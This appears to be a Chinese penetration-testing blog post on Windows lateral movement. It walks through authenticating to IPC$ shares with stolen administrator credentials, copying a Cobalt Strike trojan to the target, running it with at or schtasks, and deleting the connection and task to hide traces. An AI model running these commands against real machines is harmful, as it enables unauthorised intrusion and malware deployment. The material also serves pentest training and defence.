IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。

关于IPC$+计划任务的横向,我们的目的非常明确:

(1)首先建立向目标主机的IPC$连接

(2)其次把命令执行的脚本传到目标主机

(3)再次创建计划任务在目标机器上执行命令脚本

(4)最后过河拆桥删除IPC$连接

当然想要用IPC$来横向是有条件的:

(1)目标机器没有禁用IPC连接,没有什么防火防盗拦截IPC连接,没有什么防火防盗拦截IPC连接,没有什么防火防盗拦截IPC,139 445 端口也开了(能走445走445,不能则走139)

(2)目标机器小管理员开了IPC$默认共享服务(逻辑盘、系统目录;都不开我访问个啥?)

(3)获取了目标机器的小管理员的管理员权限的账号密码(最好是域管理员账号密码),明文的

(4)目标系统能支持IPC$,且和攻击机能彼此互通(废话)

1 使用ipc$建立连接

net use \\<IP>\ipc$ password /user:username
net use //查看当前主机所建立的连接


2 查看目标机器c盘文件

3 ipc连接还可以进行本地映射(将目标机任意盘符映射到自己的本地)

net use z: \\ip\c$ password /user:Administrator //把目标C盘映射到本地z盘(未建立ipc连接的情况下)
net use z: \\ip\c$ //把目标C盘映射到本地z盘(已建立ipc连接的情况下)

映射网络>按照你设置的填写>弹出来 密码登录框(填写) > 网络位置就会出现映射盘

4最后我们渗透完成后需要清理痕迹,这里就会用到一条删除ipc连接的命令

net use \\192.168.1.136\ipc$ /del   #删除ipc$
net use z: /del     #删除映射

计划任务

at 命令是Windows自带的用于创建计划任务的命令,但是 at 命令只在2003及以下的版本使用
schtasks命令(在2008及以后的系统中已经将at命令废弃,改用schtasks命令代替了at命令)

1 at命令调用cmd执行系统命令

使用at命令调用cmd.exe执行命令写入result.txt

at \\192.168.52.141 16:40:00 cmd.exe /c "命令 > c:\result.txt"

用type命令进行读取

type \\192.168.52.141\c$\result.txt

2 at计划任务上线
(1)首先与主机建立ipc连接
(2) 确定主机时间

net time \\ip

3 使用cs生成木马利用copy命令拷贝到主机上

copy <木马在本机位置> \\<靶机ip>\c$

4 使用at命令创建计划任务

at \\<靶机ip> <启动时间> <木马在靶机的位置>

5 删除计划任务
这里的1为创建计划任务时候的ID

at \\192.168.52.141 1 /delete

schtasks命令
1 与主机建立ipc连接

net use \\192.168.1.136\ipc$ password /user:administrator

2 使用copy命令将exe复制到靶机里

copy C:\Users\Administrator\Desktop\shell.exe \\192.168.1.136\c$


3 查看靶机时间

net time \\192.168.1.136

4 使用schtasks创建名为c的计划任务

schtasks /create /s 192.168.1.136 /u administrator /p password /tn c /tr c:/shell.exe  /sc once /st 14:34
#/s 目标 /u 用户名 /p 密码  /tn 指定文件名  /tr 指定文件路径   /sc 执行次数 或频率   /st 开始时间

schtasks /create /s 192.168.1.136 /tn c /tr c:/shell.exe  /sc once /st 14:34  #在已经连接ipc$ 可以使用这一条 但是很可能出现错误:拒绝访问


5 查看和删除任务计划

schtasks /query /s 192.168.1.136 /u administrator /p password /TN c   #查看任务计划
schtasks /delete /s 192.168.1.136 /u administrator /p password  /tn c #删除任务计划

在使用schtasks命令时,会在系统中留下日志文件C:\Windows\Tasks\SCHEDLGU.txt,如果执行schtasks命令后没有回显,可配合ipc$执行文件,使用type命令远程查看执行结果

参考:https://mohen.blog.csdn.net/article/details/118753513?spm=1001.2014.3001.5506
https://www.cnblogs.com/shy1766IT/p/6391967.html
https://blog.csdn.net/weixin_42936566/article/details/86555918?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163158541616780262533421%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=163158541616780262533421&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v29_ecpm-1-86555918.pc_search_result_hbase_insert&utm_term=%E5%88%A0%E9%99%A4ipc%E8%BF%9E%E6%8E%A5%E7%9A%84%E5%91%BD%E4%BB%A4&spm=1018.2226.3001.4187
https://blog.csdn.net/Gamma_lab/article/details/118337125?ops_request_misc=&request_id=&biz_id=102&utm_term=schtasks%E5%90%AF%E5%8A%A8ipc%E8%AE%A1%E5%88%92&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-7-118337125.pc_search_result_hbase_insert&spm=1018.2226.3001.4187

ipc$连接+计划任务相关推荐

  1. 紫光展锐CEO楚庆:5G是人类最野心勃勃的连接计划

    出品|网易科技<5G+访谈> 万物智联的5G时代即将到来,2019年5月开始,网易科技重磅打造"5G+访谈",邀请行业内大咖共话5G,探讨"5G+" ...

  2. Sql Server 连接池及其用法

    其实我们一直在使用SqlServer的连接池.在连接字符串中,Pooling为是否启用连接池,默认值为true,表示启用. 与连接池相关的两个重要参数是 Min Pool Size和 Max Pool ...

  3. 魔兽美服服务器维护,美服《魔兽世界》低人口密度服务器合并计划最新动态

    服务器合并更新 正如此前宣布的那样,我们一直努力合并低密度人口服务器以提高服务器人数,这是一个不断更新的列表,其中包含目前计划连接.未来计划连接以及已经完成连接了的服务器. *请注意,该列表并不包含所 ...

  4. Facebook开发地面技术扩大互联网连接

    4月14日消息,据<今日美国>报道,Facebook过去制定的雄心勃勃的计划是在天上放飞一个太阳能无人机队,向全球40亿左右没有上网的人发送互联网信号.现在该公司将关注点转到地面. Fac ...

  5. pg_hint_plan 使用hint固定SQL执行计划

    Plan Hint是PG社区官方版"永远"不考虑引入的功能之一(参见PG TODO,查找"Oracle-style"),社区开发者的理念是,引入Hint功能,会 ...

  6. SAP PP生产计划体系

    一,计划的分类 (1), 预测及SOP(销售与运作计划)  (2), 主生产计划  (3), 分销资源计划(DRP)  (4), 物料需求计划及库存控制  (5), 长期计划编制和模拟  (6), 能 ...

  7. 一种将 Tree-LSTM 的强化学习用于连接顺序选择的方法

    [导读] 本篇博客讲解的是 2020 年由清华大学李国良教授团队发表在 ICDE 上的论文,介绍它所提出的算法与实验结果,并结合实际情况给出一些思考. 原文链接: http://dbgroup.cs. ...

  8. python操作Windows任务计划程序

    使用python操作Windows任务计划程序 最低支持服务器:Windows Server 2008 以下参考网站 替换 en-us > zh-cn 即可查看 中文文档(为机器翻译可能不太准确 ...

  9. PP模块快速入门之功能简介(二)

    根据以下任何一个随机模型进行预测:平均移动 ,指数平滑常数模型 ,指数平滑趋势模型 ,指数平滑季节性模型 ,组合趋势/指数平滑季节性模型 R/3可以用最适用分析来自动地选择随机模型,你也可以人工选择模 ...

  10. 计量经济学建模_不了解计量经济学的前世今生,怎么能学会他

    文章来源:青年教师常子洋 作者:常子洋 计量经济学的英文名称 "Econometrics" 是最早是由挪威经济学家费里希(R.Frish)于1926年模仿 "Biomet ...

最新文章

  1. Jquery 获取对象的几种方式介绍
  2. 出现运行时间错误_Excel VBA 运行错误,你知道为何突然出现错误的原因吗
  3. win10浏览器_[系统] win10浏览器上网问题
  4. 训练机器人看脸读“心”,真的靠谱吗?
  5. WPF学习:分页控件
  6. 在CentOS上安装Git(转)
  7. 前端代码审查利器:vscode插件GitLab Workflow
  8. 专业的统计分析软件 IBM SPSS Statistics 26 Mac版(附带安装包网盘资源)
  9. PS2022安装步骤 ps 2022(详细安装方法)
  10. shell 脚本-while用法
  11. C#操作Word书签
  12. NMOS PMOS Charge pump flying capacitor充电泵
  13. 带你深入了解GPU、FPGA和ASIC
  14. 安装spinningup填坑ERROR: Could not build wheels for mpi4py which use PEP 517
  15. Alphabetic Removals(水题)
  16. 使用html5 canvas绘制简单图形小作品~灰太狼
  17. iPhone删掉的照片能恢复吗?iPhone最近删除的照片怎么恢复?
  18. python自学1:更改excel内容案例及技术总结
  19. PIVOT 和 UNPIVOT实例使用
  20. HTML5期末大作业:个人介绍/个人主页/网页设计——个人博客 (11页) HTML+CSS+JavaScript

热门文章

  1. c语言年月日问题思路总结 闰年非闰年每个月份的天数 解决今天是妹子出生的第多少天的问题
  2. 想通过培训转行软件测试可以吗
  3. Ubuntu下使用QQ
  4. Fiddler如何抓包?
  5. 跟杨春娟学SpringMVC笔记:Form表单之Spring验证框架
  6. 给我一个FPGA,可以撬起所有显示的接口和面板
  7. coursera视频打不开,coursera如何免费听课等问题解决方法
  8. 获取银行卡号或者手机号后四位
  9. ajax请求之序列化表单serialize() serializeArray()
  10. 如何把握二面?五个小技巧帮助你把抓住工作机会